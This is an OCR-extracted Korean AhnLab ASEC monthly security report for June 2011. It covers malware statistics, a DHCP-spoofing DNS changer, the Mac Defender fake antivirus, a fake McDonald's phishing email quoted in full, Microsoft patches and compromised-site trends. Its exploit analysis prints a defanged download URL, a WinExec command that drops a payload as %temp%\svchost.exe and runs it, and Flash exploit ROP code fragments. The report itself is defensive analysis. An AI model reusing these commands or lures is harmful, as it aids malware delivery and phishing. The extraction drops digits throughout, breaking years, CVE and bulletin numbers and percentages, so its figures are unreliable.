AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center)은 악성코드 및 보안 위협으로부터 고객을 안전하게 지키기 위하여 보안 전문가로 구성된 글로벌 보안 조직입니다

Transcription

1 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights reserved. ASEC REPORT VOL 안철수연구소 월간 보안 보고서 이달의 보안 동향 211년 2분기 보안 동향 해외 보안 동향

2 AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center)은 악성코드 및 보안 위협으로부터 고객을 안전하게 지키기 위하여 보안 전문가로 구성된 글로벌 보안 조직입니다. 이 리포트는 안철수연구소의 ASEC에서 작성하며, 매월 발생한 주요 보안 위협과 이슈에 대응하는 최신 보안 기술에 대한 요약 정보를 담고 있습니다. 자세한 내용은 안랩닷컴( 확인하실 수 있습니다. CONTENTS 1. 이달의 보안 동향 1. 악성코드 동향 a. 악성코드 통계 5 - 악성코드 대표진단명 감염보고 1분기 Top 2 - 악성코드 유형별 2분기 감염보고 비율 - 악성코드 월별 2분기 감염보고 건수 - 2분기 신종 악성코드 감염 보고 Top 2-2분기 신종 악성코드 유형별 분포 - 악성코드 감염보고 Top 2 - 악성코드 대표진단명 감염보고 Top 2 - 악성코드 유형별 감염보고 비율 - 악성코드 유형별 감염보고 전월 비교 - 악성코드 월별 감염보고 건수 - 신종 악성코드 감염보고 Top 2 - 신종 악성코드 유형별 분포 b. 악성코드 이슈 1 - DHCP 서버로 위장, DNS 서버 주소를 바꾸는 악성코드 - SNS로 전파되는 맥 OS X 대상의 허위 백신 - 허위 맥도날드 메일로 유포된 악성코드 b. 악성코드 이슈 27 - 모바일 악성코드의 증가와 지능화 - 스마트폰 안전하게 사용하자. 악성 앱 정리 2. 시큐리티 동향 a. 시큐리티 통계 3-211년 2분기 마이크로소프트 보안 업데이트 현황 3. 웹 보안 동향 2. 시큐리티 동향 a. 시큐리티 통계 13-6월 마이크로소프트 보안 업데이트 현황 b. 시큐리티 이슈 15 - 신규 취약점을 이용한 악성코드 유포 a. 웹 보안 통계 31 - 웹사이트 보안 요약 - 월별 악성코드 발견 건수 - 월별 악성코드 유형 - 월별 악성코드가 발견된 도메인 - 월별 악성코드가 발견된 URL - 악성코드 유형별 배포 수 - 악성코드 배포 Top 1 3. 웹 보안 동향 a. 웹 보안 통계 해외 보안 동향 - 웹사이트 보안 요약 - 월별 악성코드 배포 URL 차단 건수 - 월별 악성코드 유형 - 월별 악성코드가 발견된 도메인 - 월별 악성코드가 발견된 URL - 악성코드 유형별 배포 수 - 악성코드 배포 순위 b. 웹 보안 이슈 2 1. 일본 2 분기 악성코드 동향 35 - 컨피커 웜의 지속적인 피해 발생 - 오토런 악성코드의 감염 피해 - 일본 지진과 관련한 사회공학적 공격 발생 2. 중국 2 분기 악성코드 동향 38 - 중국 보안 업체 라이징(Rising) 21년 중국 보안 위협 동향 발표 - 211년 6월 침해 사이트 현황 - 국내 사이트 해킹을 통한 악성 코드 유포 - 211년 6월 해킹된 웹 사이트들을 통해서 유포된 악성코드 동향 년 2분기 보안 동향 2. 세계 2 분기 악성코드 동향 4 - 세계 악성코드 통계 - 맥 OSX 악성코드 증가 - 안드로이드 기반 악성코드 증가 - 64비트 악성코드 - 정보 수집 및 정보 파괴 현상 증가 1. 악성코드 동향 a. 악성코드 통계 23 - 악성코드 감염보고 2 분기 Top 2

3 Web 이달의 보안 동향 1. 악성코드 동향 a. 악성코드 통계 악성코드 감염보고 Top 2 악성코드 대표진단명 감염보고 Top 2 211년 6월 악성코드 통계현황은 다음과 같다. 211년 6월의 악성코드 감염 보고는 Textimage/Autorun 이 1위를 차지하고 있으며, JS/Swflash와 JS/Redirect가 각각 2위와 3위를 차지하였다. 신규로 Top2에 진입한 악성코드는 총 1건이다. 아래 표는 악성코드별 변종 종합 감염보고 순위를 악성코드 대표 진단명에 따라 정리한 것이다. 이를 통 해 악성코드의 동향을 파악할 수 있다. 211년 6월의 감염보고 건수는 Win-Trojan/Onlinegamehack이 총 946,451건으로 Top 2중 12.8%의 비율로 1위에 올랐으며, Win-Trojan/Downloader가 831,974건으 로 2위, Textimage/Autorun이 769,591건으로 3위를 차지하였다. 순위 등락 악성코드명 건수 비율 1 Textimage/Autoru 769, % 2 NEW JS/Swflash 471, % 3 JS/Redirect 448, % 4 1 JS/Agent 288, % 5 NEW Swf/Agent 179, % 6 1 Win32/Induc 169, % 7 NEW Html/Agent 162, % 8 NEW Html/Shellcode 132, % 9 NEW Swf/Cve , % 1 NEW Html/Flasher 127, % 11 1 Win32/Palevo1.worm.Gen 127, % 12 NEW Win-Adware/Yint , % 13 1 Win32/Conficker.worm.Gen 113,78 3. % 14 1 Win32/Olala.worm 11, % 15 1 Win32/Virut.f 92, % 16 4 Dropper/Onlinegamehack5.Gen 8, % 17 NEW Win-Trojan/Onlinegamehack R 8, % 18 NEW Win32/Flystudio.worm.Gen 79, % 19 8 JS/Cve , % 2 NEW Swf/Exploit 78, % 3,826,412 1 % [표 1-1] 악성코드 감염보고 Top 2 순위 등락 악성코드명 건수 비율 1 Win-Trojan/Onlinegamehack 946, % 2 1 Win-Trojan/Downloader 831, % 3-1 Textimage/Autorun 769, % 4 1 Win-Trojan/Agent 582, % 5 NEW JS/Swflash 471, % 6 2 JS/Redirect 448, % 7 Win32/Conficker 37,17 5. % 8 1 Win32/Autorun.worm 347, % 9 1 Win32/Virut 341, % 1 NEW Win-Adware/Korad 295, % 11 NEW JS/Agent 288, % 12 NEW Dropper/Onlinegamehack 242, % 13 9 Win-Trojan/Winsoft 234, % 14 2 Win32/Kido 234,2 3.2 % 15 4 Dropper/Malware 182, 2.5 % 16 NEW Swf/Agent 179, % 17 1 Win32/Induc 169, % 18 NEW Html/Agent 162, % 19 1 Win32/Palevo 158, % 2 5 Win-Adware/Koradware 145, % 7,42,31 1 % [표 1-2] 악성코드 대표진단명 감염보고 Top 2

4 Web 7 8 악성코드 유형별 감염보고 비율 악성코드 월별 감염보고 건수 아래 차트는 211년 6월 한 달 동안 안철수연구소가 집계한 악성코드의 유형별 감염 비율을 분석한 결과다. 211년 6 월의 감염보고 건수 중 악성코드를 유형별로 살z펴보면, 감염보고건수 비율은 트로잔류가 35.6%로 6월의 악성코드 월별 감염보고 건수는 14,176,633건으로, 5월의 악성코드 월별 감염 보고건수 14,499,855건에 비해 323,222건이 감소하였다. 가장 많이 차지하였으며, 스크립트(SCRIPT)가 2.5%, 웜(WORM)이 13.3%로 각각 그 뒤를 잇고 있다. ADWARE APPCARE DOWNLOADER DROPPER ETC % 8%.5% 1.5% 5.3% 9.7% TROJAN SCRIPT 36.5% 2.5% 2,, 18,, 16,, 14,, 17,531, % -3,31,541 14,499, % 14,176, , % SCRIPT SPYWARE TROJAN 2.5%.5% 35.6% WORM 13.3% OTHER 29.7% 12,, VIRUS WORM 5.1% 13.3% [그림 1-1] 악성코드 유형별 감염보고 비율 [그림 1-3] 악성코드 월별 감염보고 건수 악성코드 유형별 감염보고 전월 비교 악성코드 유형별 감염보고 비율을 전월과 비교하면, 스크립트, 웜, 에드웨어(ADWARE), 드롭퍼 (DROPPER), 바이러스(VIRUS), 다운로더(DOWNLOADER)가 전월에 비해 증가세를 보이고 있는 반면 트 신종 악성코드 유형별 분포 6월의 신종 악성코드 유형별 분포는 트로잔이 44%로 1위를 차지하였다. 그 뒤를 이어 애드웨어가 23%, 스크립트가 21%를 점유하였다. 로잔(TROJAN), 스파이웨어(SPYWARE)는 전월에 비해 감소한 것을 볼 수 있다. 애프케어(APPCARE)계열 들은 전월 수준을 유지하였다. SPYWARE 1% SCRIPT 21% TROJAN 44% TROJAN ADWARE APPCARE DOWNLOADER DROPPER % 35.6% ETC SCRIPT SPYWARE VIRUS WORM ETC 1% DROPPER 7% DOWNLOADER 3% DROPPER 7% DOWNLOADER 3% ADWARE 13% SCRIPT 14% WORM 1% TROJAN 61% ADWARE 23% [그림 1-2] 악성코드 유형별 감염보고 전월 비교 [그림 1-4] 신종 악성코드 유형별 분포

5 Web 9 1 신종 악성코드 감염보고 Top 2 아래 표는 6월에 신규로 접수된 악성코드 중 고객으로부터 감염이 보고된 악성코드 Top 2이다. 6월의 신종 악성코드 감염 보고 Top 2은 JS/Swflash가 471,178건으로 4.4%로 1위를 차지하였으며, Win- 1. 악성코드 동향 b. 악성코드 이슈 Adware/Yint.168가 114,618건으로 2위를 차지하였다. 순위 악성코드명 건수 비율 1 JS/Swflash 471, % 2 Win-Adware/Yint , % 3 Win-Trojan/Onlinegamehack R 8, % 4 Win-Trojan/Downloader AE 57, % 5 Win-Adware/KorAd B 5, % 6 Win-Adware/Crypter B 39, % 7 Win-Adware/KorAd C 33, % 8 Win-Trojan/Onlinegamehack , % 9 SWF/Cve , % 1 Win-Trojan/Downloader , % 11 Win-Trojan/Downloader , % 12 Win-Trojan/Downloader C 25, % 13 Win-Downloader/KorAd , % 14 Win-Trojan/Downloader S 23, % 15 Win-Trojan/Downloader C 22, % 16 Win-Adware/KorAd B 22, % 17 Win-Trojan/Agent.6656.M 21, % 18 Win-Adware/KorAd , % 19 Win-Adware/SPack , % 2 Win-Adware/Shortcut.KorAd , % 1,167,718 1 % [표 1-3] 신종 악성코드 감염보고 Top 2 DHCP 서버로 위장, DNS 서버 주소를 바꾸는 악성코드 6월 초, DHCP 환경을 사용하는 기업체 중 일부에서 인터넷이 안 된 다는 문의가 접수되었다. 해당 악성코드는 공유 네트워크나 이동식 저장매체, 또는 이미 감염된 시스템으로부터 전파 및 감염될 수 있다. 해당 악성코드에 감염되면 아래와 같은 파일이 생성된다. - %Temp%\srv(랜덤한 3자리).tmp - %Temp%\srv(랜덤한 3자리).ini 공유 네트워크 내 쓰기 가능한 폴더나 이동식 디스크에는 다음과 같 은 형태의 파일이 생성된다. - setup(랜덤한 숫자).fon - myporno.avi.lnk // MS1-46 취약점 이용 - pornmovs.lnk // MS1-46 취약점 이용 - autorun.inf 해당 악성코드는 동작 중인 시스템을 파악하기 위해(공격대상 시스 템 확인) 같은 네트워크 대역에 대해서 지속적으로 스캔 작업을 수행 한다. 이후 감염된 시스템을 DHCP 서버로 위장하여 DNS의 정보를 변경하기 위한 동작을 한다. 따라서, DHCP 서버로부터 IP 할당을 요 청한 시스템이 받게 되는 ACK 패킷 정보는 접속을 유도하는 조작된 DNS 서버 주소를 담은 악의적인 정보를 담고 있다. [그림 1-6] 변조된 DNS에 의한 페이지 연결 라우저 업데이트를 유도한다. [그림 1-6]에서 확인되는 URL 주소, 그리고 파일을 내려받는 출처도 구글로 확인되지만, 실제 구글 도메 인에서 제공하는 페이지는 아니다. 단지, 변조된 DNS에 의해 구글 도메인으로 매칭된 IP 주소가 실제 구글의 접속 IP가 아닌, 악의적인 목적의 페이지를 보여주기 위한 IP로 자동 연결되는 것이다. 결과적 으로 URL은 으로 보이지만 실제로는 관련이 없는 [그림 1-7] TCP/IP 등록정보 및 접속 가능한 DNS 서버 주소 [그림1-5] 감염된 시스템에서 보낸 DHCP 패킷 정보 따라서 DNS 정보가 악의적인 목적의 IP로 변경되어 방문하고자 하 는 웹페이지의 URL을 DNS에 문의 하여도 악의적 목적의 IP(DNS로 등록된 IP와 동일)를 응답받게 된다. 이어 아래와 같은 사회 공학 기 법을 통한 악성코드 유포 페이지로 연결된다. 해당 페이지는 사용하 는 브라우저의 버전으로는 페이지를 볼 수 없다는 메시지와 함께 브

6 Web 악의적인 목적의 다른 페이지가 보이는 것이다. 이는 구글 주소뿐만 아니라, 어느 사이트의 URL을 입력해도 마찬가지이다. 해당 악성코드의 조치 방법은 다음과 같다 '자동으로 DNS 서버 주소 받기'에서 '다음 DNS 서버 주소 사용'으로 변경 - 2. '기본 설정 DNS 서버'의 값을 내부에서 사용하는 주소 또 는 [그림 1-7]의 임의의 DNS Server 주소로 설정한다 감염된 시스템을 찾아(DHCP Server로 등록된 시스템 추 적 또는 패킷 확인) V3 제품을 최신엔진으로 업데이트한 뒤, 정밀 검사(수동 검사)를 통해 시스템 전체 검사를 수행한다. SNS로 전파되는 맥 OS X 대상의 허위 백신 5월 15일 국외에서 애플(Apple)사의 맥(Mac) OS X를 감염시키는 허위 백신인 맥 디펜더(Mac Defender)가 유명 소셜 네트워크(Social Network)를 통해 전파되는 것이 발견되었다. 그림[1-8]과 같이 트 위터(Twitter)를 이용하여 맥 운영체제 사용자들을 대상으로 게임을 소개하는 내용으로 위장첨 메시지를 발송했다. 메세지 본문에 단축 URL(URL Shortening)을 첨하여 악의적인 웹 사이트로 접속을 유도 한다. [그림 1-8] 취약한 웹 사이트로 접속을 유도하는 트위터 메시지 해당 웹 페이지는 기존 윈도 운영체제를 감염 대상으로 하였던 허 위 백신과 마찬가지로 시스템 전체를 검사하는 것처럼 속인뒤, 허 위 진단 결과를 보여준다. 그리고 맥 운영체제에서 실행되는 특정 파일을 내려받도록 유도하여 허위 백신의 감염을 시도한다. 이번 에 발견된 맥 운영체제를 감염 대상으로 하는 허위 백신은 페이스 북(Facebook)에서 성인 비디오 내용으로 유포되기 시작한 것으로, 영국 보안 업체 소포스(Sophos)에서 블로그 'Rihanna and Hayden Panettiere sex video spreads Mac malware on Facebook'을 통해 공개하였다. 맥 운영체제를 개발하는 애플사에서는 맥 운영체제 사 용자를 대상으로 유포되었던 허위 백신의 진단 및 탐지를 위해 보안 업데이트 'About Security Update 211-3'을 배포 중이다. 그러 므로 맥 운영체제를 사용하는 사용자는 해당 보안 업데이트를 설치 하고 트위터와 페이스북과 같은 소셜 네트워크를 통해 전달되는 메 시지에 포함된 단축 URL 클릭을 주의해야 한다. 허위 맥도날드 메일로 유포된 악성코드 [표 1-4] 허위 맥도날드 메일 구성 메일 제목 (다음 중 하나) We are having the holiday of free food We feed everyone for free We gift you all our dishes for free The very best day is Free Day Our visitors will be having dishes for free We are going to prove that our food is delicious and healthy Visit us on the day of free helpings Hand over the ticket and get five helpings for free Today you will get the ticket and there will be no need to pay for Get a ticket for free helpings ASEC에서는 소셜 네트워크 서비스(Social Network Service)인 트 위터(Twitter)를 통해 6월 21일 맥도날드(McDonalds) 메일로 위장해 악성코드 유포를 시도한 사례를 언급한 바 있다. 맥도날드에서 발송 하는 메일로 위장해 유포를 시도한 악성코드는 그 변형이 현재까지 도 지속적으로 발견되고 있어 사용자의 각별한 주의가 필요하다. 이 번에 유포된 허위 맥도날드 메일은 아래와 같은 메일 형식을 가지고 있으며, 무료 시식이 가능한 초대권이 첨부되었다고 알리고 있다. 첨부된 파일 Invitation_Card_[5자리 숫자들].zip의 압축을 해제하게 되면 Invitation_Card.exe(25,6 바이트)이 파일이 생성된다. [그림 1-1] 사파리 브라우저로 위장한 허위 백신의 검사 생성된 파일은 [그림1-1]과 같이 마이크로소프트 오피스 워드 (Microsoft Office Word) 파일과 동일한 아이콘을 가지고 있다. 이번 맥도날드에서 발송한 메일로 위장한 악성코드는 V3 제품 군에서 다 음과 같이 진단하고 있으며 지속적인 변형들이 발견되고 있음으로 각별한 주의가 필요하다. - Win-Trojan/Agent.256.ZN - Win-Trojan/Agent.256.ZO - Win-Trojan/Dofoil C Good afternoon. 사파리(Safari) 웹 브라우저를 사용하는 맥 운영체제 사용자가 해당 단축 URL을 클릭하게 되면 [그림 1-9]와 같은 특정 웹 사이트로 연 결된다. [그림 1-9] 사파리 브라우저로 위장한 허위 백신의 검사 웹 페이지 메일 본문 McDonalds invites you to The Free Supper Day which will take place on 27 June, 211, in every cafe of ours. Free Day?s menu! - Premium Crispy Chicken Classic Sandwich - World Famous Fries - Premium Southwest Salad - Sugar Cookie - McCafe Strawberry Banana Smoothie Print the invitation card attached to the letter and show it at the cash desk of any of our restaurants. Every manager will gladly take your card and issue you a tasty dish of Free Day. And remember! Free Day is whole five free dishes! Thank you for your credence. We really appreciate it. 첨부 파일 (다음 중 하나) - Invitation_Card_[5자리 숫자들].zip

7 Web 시큐리티 동향 a. 시큐리티 통계 6월 MS보안 업데이트 현황 마이크로소프트사가 발표한 이번 달 보안 업데이트는 16건이다. 이번 달에 MS에서 발표한 16건의 보안 패치 중 특히 원격코드 실행 가능한 취약점이 많아 사용자의 각별한 주의가 요구된다. IE 취약점과 Office 취약점과 관련해, 무분별한 메일 열람 및 인터넷 사이트 접속은 각별한 주의를 요하며, 윈도 보안 패치 및 백신 업데이트를 철저히 해야 한다 위험도 긴급 긴급 긴급 긴급 긴급 긴급 긴급 긴급 긴급 중요 중요 중요 중요 중요 중요 중요 취약점 OLE 자동화의 취약점으로 인한 원격 코드 실행 문제점 (MS11-38).NET Framework 및 Microsoft Silverlight의 취약점으로 인한 원격 코드 실행 문제점(MS11-39) Threat Management Gateway 방화벽 클라이언트의 취약점으로 인한 원격 코드 실행 문제점(MS11-4) Windows 커널 모드 드라이버의 취약점으로 인한 원격 코드 실행 문제점 (MS11-41) 분산 파일 시스템의 취약점으로 인한 원격 코드 실행 문제점 (MS11-42) SMB 클라이언트의 취약점으로 인한 원격 코드 실행 문제점 (MS11-43).NET Framework의 취약점으로 인한 원격 코드 실행 문제점(MS11-44) Internet Explorer 누적 보안 업데이트(MS11-5) 벡터 표시 언어의 취약점으로 인한 원격 코드 실행 문제점(MS11-52) MHTML의 취약점으로 인한 정보 유출 문제점(MS11-37) Microsoft Excel의 취약점으로 인한 원격 코드 실행 문제점(MS11-45) Ancillary Function Driver의 취약점으로 인한 권한 상승 문제점(MS11-46) Hyper-V의 취약점으로 인한 서비스 거부 문제점(MS11-47) SMB 서버의 취약점으로 인한 서비스 거부 문제점(MS11-48) Microsoft XML 편집기의 정보 유출 문제점(MS11-49) Active Directory 자격 증명 서비스 웹 등록의 취약점으로 인한 권한 상승 문제점(MS11-51) [그림 2-1] 공격 대상 기준별 MS 보안 업데이트 [표 2-1] 211년 6월 주요 MS 보안 업데이트

8 Web 시큐리티 동향 b. 시큐리티 이슈 해당 취약점은 SWF 파일을 이용한 취약점으로 [주소][banner][숫 자].swf, nb.swf 등의 파일명으로 유포된다. 분석해보면 [그림 2-5]와 같이 SWF 파일 내부에 쉘코드가 포함된 것을 확인할 수 있다. [그림2-5] SWF파일 분석화면 위 코드에서 사용된 쉘코드를 분석해 보면 다음과 같은 형태를 가지 고 있다. - 'hxxp://[생략]istro.com/popcalendar25/css/classic_ Images/[생략].exe' - '[생략].exe 를 받아서 디코딩 후 b[1].exe 생성' - 'WinExec 명령실행 : cmd.exe /c copy /B "[생략]\b[1].exe" / B %temp%\svchost.exe /y && start %temp%\svchost.exe' 국내 사이트 해킹을 통한 악성 코드 유포 1. 신규 취약점을 이용한 악성코드 유포 1) Adobe Flash Player 취약점(CVE )을 이용한 악성 코드 유포 6월 중순경부터 당시 -Day 취약점이었던 Adobe Flash Player 취 약점(CVE )을 이용한 악성코드가 유포되었다. 이로 인 해 다수의 사용자들로부터 피해사례가 발생했다. 해당 취약점을 이 용하는 악성코드를 분석해보면 암호화된 URL이 있으며, 이를 해제 하면 [그림 2-2]와 같이 TXT 파일을 받아 실행한다. 이 TXT 파일은 악성코드가 암호화된 파일이다. [그림 2-2]와 같이 암호화를 해제해 보면 정상적인 윈도우 실행 파일임을 확인할 수 있다. 이 악성코드의 동작 형태를 분석하면 다음과 같다. [그림 2-2] CVE 취약점 분석 [그림 2-3] 설치된 flash ActiveX 와 Plugin 버전 비교 if (Capabilities.version.toLowerCase() == "win 1,3,181,14" Capabilities.version.toLowerCase() == "win 1,3,181,22" Capabilities.version.toLowerCase() == "win 1,3,181,23") { xchg_eax_esp_ret = xchg_eax_esi_ret = pop_eax_ret = VirtualAlloc = jmp_eax = - 내부 AS 코드에서 브라우저의 UserAgent 정보와 시스템정보 확 인을 통해 다음과 같은 에러를 처리 * MSIE 와 FireFox 가 아닌 경우 * Crome 인 경우 * 플래쉬가 디버깅버전(Capabilities.isDebugger), 64비트 지원(Capabilities.supports64BitProcesses), Arobat에 삽입된 경우(Capabilities.isEmbeddedInAcrobat) [그림 2-4]는 Flash 취약점을 이용한 악성코드의 쉘코드 동작 형태 이다. [그림 2-4] Flash 취약점을 이용한 악성코드 동작 흐름 해당 쉘코드를 분석하면 특정 URL에서 확장자가.jpg인 그림파일을 받는 것으로 나와있지만, 실제로는 이미지 파일이 아닌 PE(실행파 일)형태의 악성코드 파일이다. 3) CVE 취약점 악용 악성코드 유포 이번 보안 패치 중 'MS11-5 Internet Explorer 누적 보안 업 데이트(253548)'에 포함되어 있는 'Time Element Memory Corruption(CVE )' 취약점을 악용하는 악성코드가 발견 되었다. 이 악성코드는 다음과 같은 코드를 가지고 배포되었다. [그림 2-6] 취약점 코드 4) Internet Explorer, CVE-21-86(MS1-18) 취약점을 이용 한 악성코드 유포 악성코드 감염 대상이 되는 윈도우 시스템 파일들은 imm32.dll, lpk.dll, win32.dll 등 이었으며 최근에는 ws2help.dll파일도 그 대상 이 되었다. 또한 Internet Explorer, CVE (MS1-9) 도 알려졌다. [그림 2-8] Internet Explorer 취약점을 이용한 악성 스크립트 일부 5) 시스템 파일을 변조하는 악성코드의 업데이트 최근 해킹된 웹 사이트를 통해서 유포되는 악성코드는 윈도우 정상 파일을 교체해서 실행되는 것이 대세이다. 기존의 imm32.dll, lpk.dll, midimap.dll 등을 비롯하여 최근에는 정상 ws2help.dll을 ws3help.dll 로 백업해 두고 악성코드를 ws2help.dll(약 3mb의 파일 크기를 가 지고 있음.)로 생성해 실행되는 경우가 발견되었다. [그림 2-9] 악성코드로 교체된 ws2help.dll - "info" 라는 외부 파라미터를 통해서 main.swf 파일로 URL 관련 데이터 전달받음 - 전달받은 데이터의 내부 처리 후 얻은 URL로 URLRequest(AS) EIP 변경에 영향을 주는 EAX 레지스트리 값에는 실제 스크립트 상 에서 title 에 쓰여지는 데이터 값이 위치해, 사용자 입력을 통해서 EIP 컨트롤이 가능하다. 요청함 그 밖에도 'CVE '취약점을 이용해 SWF파일을 포함시킨 [그림 2-7] 취약점 발생 위치 - Response로 받은 데이터와 Flash 파일 내부의 쉘코드를 조합 엑셀파일(.xls) 이나 아크로뱃 리더파일(.pdf) 포맷 형태로 악성코드 - 설치된 flash ActiveX 와 Plugin 버전을 비교. 가 유포되는 사례도 있다. 2) Adobe Flash Player 취약점(CVE )을 이용한 악성 코드 유포

9 Web 웹 보안 동향 a. 웹 보안 통계 월별 악성코드 유형 211년 6월 악성코드 유형은 전달의 677건에 비해 1% 수준인 679건이다. 1, % % % 웹사이트 보안 요약 안철수연구소의 웹 브라우저 보안 서비스 사이트가드(SiteGuard)를 통해 산출된 211년 6월 웹 사이 트 보안 통계 자료를 보면 악성코드를 배포하는 웹 사이트의 차단건수는 49,317건이다. 또한, 악성코 드 유형은 679건이며, 악성코드가 발견된 도메인은 636건, 악성코드가 발견된 URL은 2,398 건이다. 211년은 전월대비 악성코드가 발견된 도메인, 악성코드 발견된 URL 은 다소 감소하였으나, 악성코 드 발견 건수, 악성코드 유형은 증가하였다. 악성코드 배포 URL 차단 건수 32,918 49,317 악성코드 유형 악성코드가 발견된 도메인 악성코드가 발견된 URL [표 3-1] 웹 사이트 보안 요약 월별 악성코드 배포 URL 차단 건수 211년 6월 악성코드 배포 웹사이트 URL 접근에 따른 차단 건수는 지난 달 32,918건에 비해 15% 수준인 49,317건이다. 125, 1, 75, 5, 25, [그림 3-1] 월별 악성코드 발견 건수 +33.2% , % -74,795 32, % 2,684 2, ,399 49, % [그림 3-2] 월별 악성코드 유형 월별 악성코드가 발견된 도메인 211년 6월 악성코드가 발견된 도메인은 전달의 716건에 비해 89% 수준인 636건이다. 1, [그림 3-3] 월별 악성코드가 발견된 도메인 월별 악성코드가 발견된 URL 211년 6월 악성코드가 발견된 URL은 전달의 2,684건에 비해 89% 수준인 2,398건이다. 5, 4, 3, 2, 1, [그림 3-4] 월별 악성코드가 발견된 URL % % % , % ,684 +3% 2, % -286

10 19 Web 19 2 악성코드 유형별 배포 수 악성코드 유형별 배포 수는 애드웨어 류가 12,363건으로 전체의 37.6%의 비율을 보이며 1위를 차지 하였고, 트로잔 류가 8,48건으로 전체의 25.8%로 2위를 차지하였다. 3. 웹 보안 동향 b. 웹 보안 이슈 유형 건수 비율 DOWNLOADER 11, % DROPPER 1, % ADWARE 1, % TROJAN 7, % Win32/VIRUT % JOKE % APPCARE 21.4 % SPYWARE % ETC 6, % 49,317 1 % [표 3-2] 악성코드 유형별 배포 수 DOWNLOADER 11,71 DROPPER 1,554 ADWARE 1,262 TROJAN 7,977 ETC 6,857 WIN32/VIRUS 935 JOKE 72 APPCARE 21 SPYWARE 119 [그림 3-5] 악성코드 유형별 배포 수 악성코드 배포 순위 1, 7,5 5, 2,5 악성코드 배포 순위는 [표 3-3]에서 볼 수 있듯이 Dropper/Malware 이 4,845건으로 1위를 차지하였으며, Top1에 Dropper/Malware 등 8건이 새로 등장하였다. 순위 등락 악성코드명 건수 비율 1 NEW Dropper/Malware , % 2 NEW Win-Downloader/KorAdware , % 3 NEW Dropper/Malware , % 4 NEW Win-Downloader/Cybermy , % 5 NEW Win-Adware/KorZlob , % 6 NEW Win32/Induc 2, % 7 NEW Win-Downloader/Cybermy , % 8 7 Win-Adware/Shortcut.InlivePlayerActiveX.234 2, % 9 6 Win-Adware/Shortcut.Unni , % 1 NEW Dropper/Small.Gen 1, % 29,956 1 % [표 3-3] 악성코드 배포 Top 1 211년 6월 침해 사이트 현황 6월 침해사이트 현황은 수치 상의 큰 변화는 없었지만 6월 중순경부 터 해킹된 국내 웹 사이트를 통해 Adobe Flash Player의 -Day 취 약점(CVE )을 이용한 악성코드 유포사례가 눈에 띄게 증가했다. [그림 3-6] 211년 6월 악성코드 유포 목적의 침해 사이트 현황 [표 3-4]는 6월 한달 간 여러 사이트들을 통해서 가장 많이 유포된 악 성코드들에 대한 순위를 나타낸 것이다. Win-Trojan/Patched.DE가 부 동의 1위를 고수하고 있으며, 6월애는 특히 파일의 크기가 3mb되는 악성코드들의 유포가 눈에 띄게 증가하였다. 6월 한달 간 해킹된 웹 사 이트를 통해 유포된 악성코드들의 동향을 요약해 보면 아래와 같다. [표 3-4] 해킹된 웹 사이트를 통해서 유포된 악성코드 Top 1 순위 악성코드명 건수 1 Win-Trojan/Patched.DE 44 2 Win-Trojan/Agent Dropper/Onlinegamehack Win-Trojan/Onlinegamehack Dropper/Onlinegamehack Win-Trojan/Onlinegamehack Dropper/Onlinegamehack Dropper/Onlinegamehack Win-Trojan/Onlinegamehack55.Gen 15 1 Win-Trojan/Onlinegamehack56.Gen 15 - 신규 Adobe Flash Player 취약점(CVE )을 이용한 악 성코드 유포: - 시스템 파일을 변조하는 악성코드의 업데이트: ahnlab.com/33 - 웹 공격(SQL Injection)을 통한 악성코드 유포: ahnlab.com/35 국내 사이트 해킹을 통한 악성 코드 유포 기존 공격 방식은 서버를 해킹하여 서버 자원을 이용하는 형태가 대 부분이었으나, 최근 공격 방식은 서버 해킹을 통해 클라이언트를 해 킹해 공격하는 것으로 계속 변화고 있다. 또한 패치가 나오기 전까 지는 취약점을 이용한(제로데이 취약점) 공격에 클라이언트 사용자 는 속수무책으로 당할 수 밖에 없는 실정이다. 이는 클라이언트 보 안도 중요하지만, 첫 번째 타겟이 되어 악성코드를 유포하는 서버 측에서의 보안이 절실히 요구된다. 현재 일어나고 있는 웹 해킹 취 약점 사례를 살펴보면, 대부분 이미 알려진 공격이며 아주 손쉬운 공격 형태를 보이고 있다. 따라서 보안에 조금만 신경을 쓰면 자동화 된 공격 툴이나 스크립트 키드에 의한 공격만큼은 손쉽게 방어할 수 있을 것이다. 아무리 보안이 잘된 사이트라 할지라도, 새로운 공격 기법이 나오거 나 1% 중에.1%만 잘못된다면 큰 사고로 이어질 수 있다. 이를 방지하기 위한 준수사항은 다음과 같다. 1. 안전한 보안 프로그래밍 - 보안 라이브러리 또는 공격 기법을 파악하고 프로그래밍 한다. 2. 주기적인 점검 - 모의 해킹/컨설팅 등을 통해 주기적으로 점검해야 한다. 3. 주기적인 모니터링 - 웹사이트 변조 유무를 주기적으로 모니터링 해야 한다. - 로그를 통해 이상 유무를 주기적으로 모니터링 해야 한다. - 웹쉘 형태의 스크립트를 주기적으로 모니티링 해야 한다. 4. IDS/IPS 등 보안 장비를 통해 실시간 감시 5. 보안 교육을 통해 주기적인 보안 의식을 가져야 한다.

11 Web 년 6월 해킹된 웹 사이트들을 통해서 유포된 악성코드 동향 1. 웹 공격(SQL Injection)을 통한 악성코드 유포 최근 Armorize라는 보안업체가 블로그에 공개한 내용에 따르면 다 수의 사이트들을 대상으로 웹 공격이 발생하여 해킹된 후 악성코드 가 유포되는 사례가 있었다. 해당 업체의 블로그에는 이번 사례의 [그림 3-8]을 보면 국내 사이트도 해킹되어 악성코드를 유포했던 것 으로 확인되지만 해당 사이트 주소는 언급하지 않는다. 76개 사이 트들에 대해 6월 18일 부터 24시간 동안 모니터링 한 결과 당시 상 당 수의 사이트가 여전히 악성코드를 유포 중임을 확인했다. 국가별 로 분류해 보면 아래 [그림 3-9]와 같다. [그림 3-9] 211년 6월 18일 기준 국가별 피해현황 Case 3 '</head><body leftmargin="""" topmargin="""" marginwidth="""" marginheight="""" bgcolor=""#7b396a""><script type=""text/javascript"" src="" script><center><table border="""" cellpadding="""" cellspacing="""">' [그림 3-12] forumthrea.php에 접속 시 나타나는 증상 기술적인 내용과 해킹되어 악성코드를 유포했던 일부 사이트들이 공개되었다. 위 3개의 Case에서 볼 수 있듯이 sidename.js는 동일하지만 해당 자바 스크립트 파일이 링크된 주소는 고정적이지 않았다. 즉, 다수의 Mass Meshing Injection: sidename.js ongoing: URL들이 sidename.js를 위해서 사용되고 있었다는 의미이며, 이를 국가별로 분류를 해보면 아래 그림 [그림 3-1]과 같다. [그림 3-13] 1차 난독화 해제 후 자바 스크립트 코드 sidenamejs.html [그림 3-1] 